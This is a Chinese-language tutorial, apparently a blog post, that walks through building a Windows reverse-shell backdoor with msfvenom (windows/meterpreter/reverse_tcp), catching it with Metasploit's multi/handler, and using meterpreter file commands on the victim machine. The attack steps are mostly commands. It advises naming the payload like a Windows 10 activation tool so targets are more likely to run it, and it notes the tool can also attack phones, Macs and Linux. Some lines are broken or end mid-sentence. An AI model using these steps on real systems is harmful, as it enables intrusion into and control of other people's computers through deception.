演示环境

msfvenom a Metasploit standalone payload generator，Also a replacement for msfpayload and msfencode.是用来生成后门的软件。

MSFvenom是Msfpayload和Msfencode的组合，将这两个工具都放在一个Framework实例中。自2015年6月8日起，msfvenom替换了msfpayload和msfencode。

提示：执行命令之后输入Kali的密码，密码是被隐藏的，直接输入然后回车即可

命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST

=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe
解释： 本地ip写自己Kali的IP地址，用ifconfig就能查看自己Kali的IP地址

本地端口自己随便设置一个没有被占用的端口号，如果端口号被占用那么文件会生成失败，换一个端口号就性
文件名可以随便写自己喜欢的名字，比如写Win10激活工具，可能更容易让目标主机上钩
当然MSF也可以用来入侵手机、mac、Linux等

提示：这个就是Kali主机的IP地址

 

 

 

（1）命令： use exploit/multi/handler （选择模块）

（2）命令：set payload windows/meterpreter/

  reverse_tcp（选择攻击模块）

（3）命令： set LhOST 192.168.32.1 （填写自己主机的IP地址）

（4）命令： set lport 1111 （填写刚才生成文件时的端口号）

（5）命令： show options （查看设置参数）

（6）命令： exploit -z -j （后台执行）

提示：参数设置好之后在靶机打开程序然后执行步骤6的命令，也可以直接输入命令exploit开始攻击

 

 

提示：出现meterpreter你就已经成功的入侵的对方的电脑

还可以查看帮助文档，命令help

cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件（ls 的别名）
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程

把文件上传到靶机命

把文件下载到主机命令

今天的内容就分享到这里

为方便大家讨论